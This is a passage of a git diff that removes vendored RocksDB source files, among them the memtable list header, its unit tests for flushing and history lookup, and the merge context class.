-  // REQUIRE: m is an immutable memtable
-  void Remove(MemTable* m, autovector<MemTable*>* to_delete);
-
-  void TrimHistory(autovector<MemTable*>* to_delete);
-
-  bool GetFromList(std::list<MemTable*>* list, const LookupKey& key,
-                   std::string* value, Status* s, MergeContext* merge_context,
-                   RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                   const ReadOptions& read_opts, bool* is_blob_index = nullptr);
-
-  void AddMemTable(MemTable* m);
-
-  void UnrefMemTable(autovector<MemTable*>* to_delete, MemTable* m);
-
-  friend class MemTableList;
-
-  // Immutable MemTables that have not yet been flushed.
-  std::list<MemTable*> memlist_;
-
-  // MemTables that have already been flushed
-  // (used during Transaction validation)
-  std::list<MemTable*> memlist_history_;
-
-  // Maximum number of MemTables to keep in memory (including both flushed
-  // and not-yet-flushed tables).
-  const int max_write_buffer_number_to_maintain_;
-
-  int refs_ = 0;
-
-  size_t* parent_memtable_list_memory_usage_;
-};
-
-// This class stores references to all the immutable memtables.
-// The memtables are flushed to L0 as soon as possible and in
-// any order. If there are more than one immutable memtable, their
-// flushes can occur concurrently.  However, they are 'committed'
-// to the manifest in FIFO order to maintain correctness and
-// recoverability from a crash.
-//
-//
-// Other than imm_flush_needed, this class is not thread-safe and requires
-// external synchronization (such as holding the db mutex or being on the
-// write thread.)
-class MemTableList {
- public:
-  // A list of memtables.
-  explicit MemTableList(int min_write_buffer_number_to_merge,
-                        int max_write_buffer_number_to_maintain)
-      : imm_flush_needed(false),
-        min_write_buffer_number_to_merge_(min_write_buffer_number_to_merge),
-        current_(new MemTableListVersion(&current_memory_usage_,
-                                         max_write_buffer_number_to_maintain)),
-        num_flush_not_started_(0),
-        commit_in_progress_(false),
-        flush_requested_(false) {
-    current_->Ref();
-    current_memory_usage_ = 0;
-  }
-
-  // Should not delete MemTableList without making sure MemTableList::current()
-  // is Unref()'d.
-  ~MemTableList() {}
-
-  MemTableListVersion* current() { return current_; }
-
-  // so that background threads can detect non-nullptr pointer to
-  // determine whether there is anything more to start flushing.
-  std::atomic<bool> imm_flush_needed;
-
-  // Returns the total number of memtables in the list that haven't yet
-  // been flushed and logged.
-  int NumNotFlushed() const;
-
-  // Returns total number of memtables in the list that have been
-  // completely flushed and logged.
-  int NumFlushed() const;
-
-  // Returns true if there is at least one memtable on which flush has
-  // not yet started.
-  bool IsFlushPending() const;
-
-  // Returns the earliest memtables that needs to be flushed. The returned
-  // memtables are guaranteed to be in the ascending order of created time.
-  void PickMemtablesToFlush(autovector<MemTable*>* mems);
-
-  // Reset status of the given memtable list back to pending state so that
-  // they can get picked up again on the next round of flush.
-  void RollbackMemtableFlush(const autovector<MemTable*>& mems,
-                             uint64_t file_number);
-
-  // Commit a successful flush in the manifest file
-  Status InstallMemtableFlushResults(
-      ColumnFamilyData* cfd, const MutableCFOptions& mutable_cf_options,
-      const autovector<MemTable*>& m, VersionSet* vset, InstrumentedMutex* mu,
-      uint64_t file_number, autovector<MemTable*>* to_delete,
-      Directory* db_directory, LogBuffer* log_buffer);
-
-  // New memtables are inserted at the front of the list.
-  // Takes ownership of the referenced held on *m by the caller of Add().
-  void Add(MemTable* m, autovector<MemTable*>* to_delete);
-
-  // Returns an estimate of the number of bytes of data in use.
-  size_t ApproximateMemoryUsage();
-
-  // Returns an estimate of the number of bytes of data used by
-  // the unflushed mem-tables.
-  size_t ApproximateUnflushedMemTablesMemoryUsage();
-
-  // Returns an estimate of the timestamp of the earliest key.
-  uint64_t ApproximateOldestKeyTime() const;
-
-  // Request a flush of all existing memtables to storage.  This will
-  // cause future calls to IsFlushPending() to return true if this list is
-  // non-empty (regardless of the min_write_buffer_number_to_merge
-  // parameter). This flush request will persist until the next time
-  // PickMemtablesToFlush() is called.
-  void FlushRequested() { flush_requested_ = true; }
-
-  bool HasFlushRequested() { return flush_requested_; }
-
-  // Copying allowed
-  // MemTableList(const MemTableList&);
-  // void operator=(const MemTableList&);
-
-  size_t* current_memory_usage() { return &current_memory_usage_; }
-
-  uint64_t GetMinLogContainingPrepSection();
-
- private:
-  // DB mutex held
-  void InstallNewVersion();
-
-  const int min_write_buffer_number_to_merge_;
-
-  MemTableListVersion* current_;
-
-  // the number of elements that still need flushing
-  int num_flush_not_started_;
-
-  // committing in progress
-  bool commit_in_progress_;
-
-  // Requested a flush of all memtables to storage
-  bool flush_requested_;
-
-  // The current memory usage.
-  size_t current_memory_usage_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable_list_test.cc b/thirdparty/rocksdb/db/memtable_list_test.cc
deleted file mode 100644
index 30e5166..0000000
--- a/thirdparty/rocksdb/db/memtable_list_test.cc
+++ /dev/null
@@ -1,615 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/memtable_list.h"
-#include <algorithm>
-#include <string>
-#include <vector>
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "db/version_set.h"
-#include "db/write_controller.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class MemTableListTest : public testing::Test {
- public:
-  std::string dbname;
-  DB* db;
-  Options options;
-
-  MemTableListTest() : db(nullptr) {
-    dbname = test::TmpDir() + "/memtable_list_test";
-  }
-
-  // Create a test db if not yet created
-  void CreateDB() {
-    if (db == nullptr) {
-      options.create_if_missing = true;
-      DestroyDB(dbname, options);
-      Status s = DB::Open(options, dbname, &db);
-      EXPECT_OK(s);
-    }
-  }
-
-  ~MemTableListTest() {
-    if (db) {
-      delete db;
-      DestroyDB(dbname, options);
-    }
-  }
-
-  // Calls MemTableList::InstallMemtableFlushResults() and sets up all
-  // structures needed to call this function.
-  Status Mock_InstallMemtableFlushResults(
-      MemTableList* list, const MutableCFOptions& mutable_cf_options,
-      const autovector<MemTable*>& m, autovector<MemTable*>* to_delete) {
-    // Create a mock Logger
-    test::NullLogger logger;
-    LogBuffer log_buffer(DEBUG_LEVEL, &logger);
-
-    // Create a mock VersionSet
-    DBOptions db_options;
-    ImmutableDBOptions immutable_db_options(db_options);
-    EnvOptions env_options;
-    shared_ptr<Cache> table_cache(NewLRUCache(50000, 16));
-    WriteBufferManager write_buffer_manager(db_options.db_write_buffer_size);
-    WriteController write_controller(10000000u);
-
-    CreateDB();
-    VersionSet versions(dbname, &immutable_db_options, env_options,
-                        table_cache.get(), &write_buffer_manager,
-                        &write_controller);
-
-    // Create mock default ColumnFamilyData
-    ColumnFamilyOptions cf_options;
-    std::vector<ColumnFamilyDescriptor> column_families;
-    column_families.emplace_back(kDefaultColumnFamilyName, cf_options);
-    EXPECT_OK(versions.Recover(column_families, false));
-
-    auto column_family_set = versions.GetColumnFamilySet();
-    auto cfd = column_family_set->GetColumnFamily(0);
-    EXPECT_TRUE(cfd != nullptr);
-
-    // Create dummy mutex.
-    InstrumentedMutex mutex;
-    InstrumentedMutexLock l(&mutex);
-
-    return list->InstallMemtableFlushResults(cfd, mutable_cf_options, m,
-                                             &versions, &mutex, 1, to_delete,
-                                             nullptr, &log_buffer);
-  }
-};
-
-TEST_F(MemTableListTest, Empty) {
-  // Create an empty MemTableList and validate basic functions.
-  MemTableList list(1, 0);
-
-  ASSERT_EQ(0, list.NumNotFlushed());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_FALSE(list.IsFlushPending());
-
-  autovector<MemTable*> mems;
-  list.PickMemtablesToFlush(&mems);
-  ASSERT_EQ(0, mems.size());
-
-  autovector<MemTable*> to_delete;
-  list.current()->Unref(&to_delete);
-  ASSERT_EQ(0, to_delete.size());
-}
-
-TEST_F(MemTableListTest, GetTest) {
-  // Create MemTableList
-  int min_write_buffer_number_to_merge = 2;
-  int max_write_buffer_number_to_maintain = 0;
-  MemTableList list(min_write_buffer_number_to_merge,
-                    max_write_buffer_number_to_maintain);
-
-  SequenceNumber seq = 1;
-  std::string value;
-  Status s;
-  MergeContext merge_context;
-  InternalKeyComparator ikey_cmp(options.comparator);
-  RangeDelAggregator range_del_agg(ikey_cmp, {} /* snapshots */);
-  autovector<MemTable*> to_delete;
-
-  LookupKey lkey("key1", seq);
-  bool found = list.current()->Get(lkey, &value, &s, &merge_context,
-                                   &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Create a MemTable
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto factory = std::make_shared<SkipListFactory>();
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* mem = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                               kMaxSequenceNumber, 0 /* column_family_id */);
-  mem->Ref();
-
-  // Write some keys to this memtable.
-  mem->Add(++seq, kTypeDeletion, "key1", "");
-  mem->Add(++seq, kTypeValue, "key2", "value2");
-  mem->Add(++seq, kTypeValue, "key1", "value1");
-  mem->Add(++seq, kTypeValue, "key2", "value2.2");
-
-  // Fetch the newly written keys
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key1", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value1");
-
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key1", 2), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  // MemTable found out that this key is *not* found (at this sequence#)
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key2", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value2.2");
-
-  ASSERT_EQ(4, mem->num_entries());
-  ASSERT_EQ(1, mem->num_deletes());
-
-  // Add memtable to list
-  list.Add(mem, &to_delete);
-
-  SequenceNumber saved_seq = seq;
-
-  // Create another memtable and write some keys to it
-  WriteBufferManager wb2(options.db_write_buffer_size);
-  MemTable* mem2 = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb2,
-                                kMaxSequenceNumber, 0 /* column_family_id */);
-  mem2->Ref();
-
-  mem2->Add(++seq, kTypeDeletion, "key1", "");
-  mem2->Add(++seq, kTypeValue, "key2", "value2.3");
-
-  // Add second memtable to list
-  list.Add(mem2, &to_delete);
-
-  // Fetch keys via MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", saved_seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ("value1", value);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value2.3");
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", 1), &value, &s, &merge_context,
-                              &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  ASSERT_EQ(2, list.NumNotFlushed());
-
-  list.current()->Unref(&to_delete);
-  for (MemTable* m : to_delete) {
-    delete m;
-  }
-}
-
-TEST_F(MemTableListTest, GetFromHistoryTest) {
-  // Create MemTableList
-  int min_write_buffer_number_to_merge = 2;
-  int max_write_buffer_number_to_maintain = 2;
-  MemTableList list(min_write_buffer_number_to_merge,
-                    max_write_buffer_number_to_maintain);
-
-  SequenceNumber seq = 1;
-  std::string value;
-  Status s;
-  MergeContext merge_context;
-  InternalKeyComparator ikey_cmp(options.comparator);
-  RangeDelAggregator range_del_agg(ikey_cmp, {} /* snapshots */);
-  autovector<MemTable*> to_delete;
-
-  LookupKey lkey("key1", seq);
-  bool found = list.current()->Get(lkey, &value, &s, &merge_context,
-                                   &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Create a MemTable
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto factory = std::make_shared<SkipListFactory>();
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* mem = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                               kMaxSequenceNumber, 0 /* column_family_id */);
-  mem->Ref();
-
-  // Write some keys to this memtable.
-  mem->Add(++seq, kTypeDeletion, "key1", "");
-  mem->Add(++seq, kTypeValue, "key2", "value2");
-  mem->Add(++seq, kTypeValue, "key2", "value2.2");
-
-  // Fetch the newly written keys
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key1", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  // MemTable found out that this key is *not* found (at this sequence#)
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = mem->Get(LookupKey("key2", seq), &value, &s, &merge_context,
-                   &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ(value, "value2.2");
-
-  // Add memtable to list
-  list.Add(mem, &to_delete);
-  ASSERT_EQ(0, to_delete.size());
-
-  // Fetch keys via MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_TRUE(s.ok() && found);
-  ASSERT_EQ("value2.2", value);
-
-  // Flush this memtable from the list.
-  // (It will then be a part of the memtable history).
-  autovector<MemTable*> to_flush;
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(1, to_flush.size());
-
-  s = Mock_InstallMemtableFlushResults(&list, MutableCFOptions(options),
-                                       to_flush, &to_delete);
-  ASSERT_OK(s);
-  ASSERT_EQ(0, list.NumNotFlushed());
-  ASSERT_EQ(1, list.NumFlushed());
-  ASSERT_EQ(0, to_delete.size());
-
-  // Verify keys are no longer in MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Verify keys are present in history
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key1", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key2", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found);
-  ASSERT_EQ("value2.2", value);
-
-  // Create another memtable and write some keys to it
-  WriteBufferManager wb2(options.db_write_buffer_size);
-  MemTable* mem2 = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb2,
-                                kMaxSequenceNumber, 0 /* column_family_id */);
-  mem2->Ref();
-
-  mem2->Add(++seq, kTypeDeletion, "key1", "");
-  mem2->Add(++seq, kTypeValue, "key3", "value3");
-
-  // Add second memtable to list
-  list.Add(mem2, &to_delete);
-  ASSERT_EQ(0, to_delete.size());
-
-  to_flush.clear();
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(1, to_flush.size());
-
-  // Flush second memtable
-  s = Mock_InstallMemtableFlushResults(&list, MutableCFOptions(options),
-                                       to_flush, &to_delete);
-  ASSERT_OK(s);
-  ASSERT_EQ(0, list.NumNotFlushed());
-  ASSERT_EQ(2, list.NumFlushed());
-  ASSERT_EQ(0, to_delete.size());
-
-  // Add a third memtable to push the first memtable out of the history
-  WriteBufferManager wb3(options.db_write_buffer_size);
-  MemTable* mem3 = new MemTable(cmp, ioptions, MutableCFOptions(options), &wb3,
-                                kMaxSequenceNumber, 0 /* column_family_id */);
-  mem3->Ref();
-  list.Add(mem3, &to_delete);
-  ASSERT_EQ(1, list.NumNotFlushed());
-  ASSERT_EQ(1, list.NumFlushed());
-  ASSERT_EQ(1, to_delete.size());
-
-  // Verify keys are no longer in MemTableList
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key1", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key3", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Verify that the second memtable's keys are in the history
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key1", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found && s.IsNotFound());
-
-  merge_context.Clear();
-  found = list.current()->GetFromHistory(LookupKey("key3", seq), &value, &s,
-                                         &merge_context, &range_del_agg,
-                                         ReadOptions());
-  ASSERT_TRUE(found);
-  ASSERT_EQ("value3", value);
-
-  // Verify that key2 from the first memtable is no longer in the history
-  merge_context.Clear();
-  found = list.current()->Get(LookupKey("key2", seq), &value, &s,
-                              &merge_context, &range_del_agg, ReadOptions());
-  ASSERT_FALSE(found);
-
-  // Cleanup
-  list.current()->Unref(&to_delete);
-  ASSERT_EQ(3, to_delete.size());
-  for (MemTable* m : to_delete) {
-    delete m;
-  }
-}
-
-TEST_F(MemTableListTest, FlushPendingTest) {
-  const int num_tables = 5;
-  SequenceNumber seq = 1;
-  Status s;
-
-  auto factory = std::make_shared<SkipListFactory>();
-  options.memtable_factory = factory;
-  ImmutableCFOptions ioptions(options);
-  InternalKeyComparator cmp(BytewiseComparator());
-  WriteBufferManager wb(options.db_write_buffer_size);
-  autovector<MemTable*> to_delete;
-
-  // Create MemTableList
-  int min_write_buffer_number_to_merge = 3;
-  int max_write_buffer_number_to_maintain = 7;
-  MemTableList list(min_write_buffer_number_to_merge,
-                    max_write_buffer_number_to_maintain);
-
-  // Create some MemTables
-  std::vector<MemTable*> tables;
-  MutableCFOptions mutable_cf_options(options);
-  for (int i = 0; i < num_tables; i++) {
-    MemTable* mem = new MemTable(cmp, ioptions, mutable_cf_options, &wb,
-                                 kMaxSequenceNumber, 0 /* column_family_id */);
-    mem->Ref();
-
-    std::string value;
-    MergeContext merge_context;
-
-    mem->Add(++seq, kTypeValue, "key1", ToString(i));
-    mem->Add(++seq, kTypeValue, "keyN" + ToString(i), "valueN");
-    mem->Add(++seq, kTypeValue, "keyX" + ToString(i), "value");
-    mem->Add(++seq, kTypeValue, "keyM" + ToString(i), "valueM");
-    mem->Add(++seq, kTypeDeletion, "keyX" + ToString(i), "");
-
-    tables.push_back(mem);
-  }
-
-  // Nothing to flush
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-  autovector<MemTable*> to_flush;
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(0, to_flush.size());
-
-  // Request a flush even though there is nothing to flush
-  list.FlushRequested();
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Attempt to 'flush' to clear request for flush
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(0, to_flush.size());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Request a flush again
-  list.FlushRequested();
-  // No flush pending since the list is empty.
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Add 2 tables
-  list.Add(tables[0], &to_delete);
-  list.Add(tables[1], &to_delete);
-  ASSERT_EQ(2, list.NumNotFlushed());
-  ASSERT_EQ(0, to_delete.size());
-
-  // Even though we have less than the minimum to flush, a flush is
-  // pending since we had previously requested a flush and never called
-  // PickMemtablesToFlush() to clear the flush.
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(2, to_flush.size());
-  ASSERT_EQ(2, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Revert flush
-  list.RollbackMemtableFlush(to_flush, 0);
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  to_flush.clear();
-
-  // Add another table
-  list.Add(tables[2], &to_delete);
-  // We now have the minimum to flush regardles of whether FlushRequested()
-  // was called.
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_EQ(0, to_delete.size());
-
-  // Pick tables to flush
-  list.PickMemtablesToFlush(&to_flush);
-  ASSERT_EQ(3, to_flush.size());
-  ASSERT_EQ(3, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush again
-  autovector<MemTable*> to_flush2;
-  list.PickMemtablesToFlush(&to_flush2);
-  ASSERT_EQ(0, to_flush2.size());
-  ASSERT_EQ(3, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Add another table
-  list.Add(tables[3], &to_delete);
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_EQ(0, to_delete.size());
-
-  // Request a flush again
-  list.FlushRequested();
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush again
-  list.PickMemtablesToFlush(&to_flush2);
-  ASSERT_EQ(1, to_flush2.size());
-  ASSERT_EQ(4, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Rollback first pick of tables
-  list.RollbackMemtableFlush(to_flush, 0);
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  to_flush.clear();
-
-  // Add another tables
-  list.Add(tables[4], &to_delete);
-  ASSERT_EQ(5, list.NumNotFlushed());
-  // We now have the minimum to flush regardles of whether FlushRequested()
-  ASSERT_TRUE(list.IsFlushPending());
-  ASSERT_TRUE(list.imm_flush_needed.load(std::memory_order_acquire));
-  ASSERT_EQ(0, to_delete.size());
-
-  // Pick tables to flush
-  list.PickMemtablesToFlush(&to_flush);
-  // Should pick 4 of 5 since 1 table has been picked in to_flush2
-  ASSERT_EQ(4, to_flush.size());
-  ASSERT_EQ(5, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Pick tables to flush again
-  autovector<MemTable*> to_flush3;
-  ASSERT_EQ(0, to_flush3.size());  // nothing not in progress of being flushed
-  ASSERT_EQ(5, list.NumNotFlushed());
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Flush the 4 memtables that were picked in to_flush
-  s = Mock_InstallMemtableFlushResults(&list, MutableCFOptions(options),
-                                       to_flush, &to_delete);
-  ASSERT_OK(s);
-
-  // Note:  now to_flush contains tables[0,1,2,4].  to_flush2 contains
-  // tables[3].
-  // Current implementation will only commit memtables in the order they were
-  // created.  So InstallMemtableFlushResults will install the first 3 tables
-  // in to_flush and stop when it encounters a table not yet flushed.
-  ASSERT_EQ(2, list.NumNotFlushed());
-  int num_in_history = std::min(3, max_write_buffer_number_to_maintain);
-  ASSERT_EQ(num_in_history, list.NumFlushed());
-  ASSERT_EQ(5 - list.NumNotFlushed() - num_in_history, to_delete.size());
-
-  // Request a flush again. Should be nothing to flush
-  list.FlushRequested();
-  ASSERT_FALSE(list.IsFlushPending());
-  ASSERT_FALSE(list.imm_flush_needed.load(std::memory_order_acquire));
-
-  // Flush the 1 memtable that was picked in to_flush2
-  s = MemTableListTest::Mock_InstallMemtableFlushResults(
-      &list, MutableCFOptions(options), to_flush2, &to_delete);
-  ASSERT_OK(s);
-
-  // This will actually install 2 tables.  The 1 we told it to flush, and also
-  // tables[4] which has been waiting for tables[3] to commit.
-  ASSERT_EQ(0, list.NumNotFlushed());
-  num_in_history = std::min(5, max_write_buffer_number_to_maintain);
-  ASSERT_EQ(num_in_history, list.NumFlushed());
-  ASSERT_EQ(5 - list.NumNotFlushed() - num_in_history, to_delete.size());
-
-  for (const auto& m : to_delete) {
-    // Refcount should be 0 after calling InstallMemtableFlushResults.
-    // Verify this, by Ref'ing then UnRef'ing:
-    m->Ref();
-    ASSERT_EQ(m, m->Unref());
-    delete m;
-  }
-  to_delete.clear();
-
-  list.current()->Unref(&to_delete);
-  int to_delete_size = std::min(5, max_write_buffer_number_to_maintain);
-  ASSERT_EQ(to_delete_size, to_delete.size());
-
-  for (const auto& m : to_delete) {
-    // Refcount should be 0 after calling InstallMemtableFlushResults.
-    // Verify this, by Ref'ing then UnRef'ing:
-    m->Ref();
-    ASSERT_EQ(m, m->Unref());
-    delete m;
-  }
-  to_delete.clear();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/merge_context.h b/thirdparty/rocksdb/db/merge_context.h
deleted file mode 100644
index 5e75e09..0000000
--- a/thirdparty/rocksdb/db/merge_context.h
+++ /dev/null
@@ -1,116 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include <string>
-#include <vector>
-#include "db/dbformat.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-const std::vector<Slice> empty_operand_list;
-
-// The merge context for merging a user key.
-// When doing a Get(), DB will create such a class and pass it when
-// issuing Get() operation to memtables and version_set. The operands
-// will be fetched from the context when issuing partial of full merge.
-class MergeContext {
- public:
-  // Clear all the operands
-  void Clear() {
-    if (operand_list_) {
-      operand_list_->clear();
-      copied_operands_->clear();
-    }
-  }
-
-  // Push a merge operand
-  void PushOperand(const Slice& operand_slice, bool operand_pinned = false) {
-    Initialize();
-    SetDirectionBackward();
-
-    if (operand_pinned) {
-      operand_list_->push_back(operand_slice);
-    } else {
-      // We need to have our own copy of the operand since it's not pinned
-      copied_operands_->emplace_back(
-          new std::string(operand_slice.data(), operand_slice.size()));
-      operand_list_->push_back(*copied_operands_->back());
-    }
-  }
-
-  // Push back a merge operand
-  void PushOperandBack(const Slice& operand_slice,
-                       bool operand_pinned = false) {
-    Initialize();
-    SetDirectionForward();
-
-    if (operand_pinned) {
-      operand_list_->push_back(operand_slice);
-    } else {
-      // We need to have our own copy of the operand since it's not pinned
-      copied_operands_->emplace_back(
-          new std::string(operand_slice.data(), operand_slice.size()));
-      operand_list_->push_back(*copied_operands_->back());
-    }
-  }
-
-  // return total number of operands in the list
-  size_t GetNumOperands() const {
-    if (!operand_list_) {
-      return 0;
-    }
-    return operand_list_->size();
-  }
-
-  // Get the operand at the index.
-  Slice GetOperand(int index) {
-    assert(operand_list_);
-
-    SetDirectionForward();
-    return (*operand_list_)[index];
-  }
-
-  // Return all the operands.
-  const std::vector<Slice>& GetOperands() {
-    if (!operand_list_) {
-      return empty_operand_list;
-    }
-
-    SetDirectionForward();
-    return *operand_list_;
-  }
-
- private:
-  void Initialize() {
-    if (!operand_list_) {
-      operand_list_.reset(new std::vector<Slice>());
-      copied_operands_.reset(new std::vector<std::unique_ptr<std::string>>());
-    }
-  }
-
-  void SetDirectionForward() {
-    if (operands_reversed_ == true) {
-      std::reverse(operand_list_->begin(), operand_list_->end());
-      operands_reversed_ = false;
-    }
-  }
-
-  void SetDirectionBackward() {
-    if (operands_reversed_ == false) {
-      std::reverse(operand_list_->begin(), operand_list_->end());
-      operands_reversed_ = true;
-    }
-  }
-
-  // List of operands
-  std::unique_ptr<std::vector<Slice>> operand_list_;
-  // Copy of operands that are not pinned.
-  std::unique_ptr<std::vector<std::unique_ptr<std::string>>> copied_operands_;
-  bool operands_reversed_ = true;
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/merge_helper.cc b/thirdparty/rocksdb/db/merge_helper.cc
deleted file mode 100644
index 55f8254..0000000
--- a/thirdparty/rocksdb/db/merge_helper.cc
+++ /dev/null
@@ -1,393 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/merge_helper.h"
-
-#include <stdio.h>
-#include <string>
-
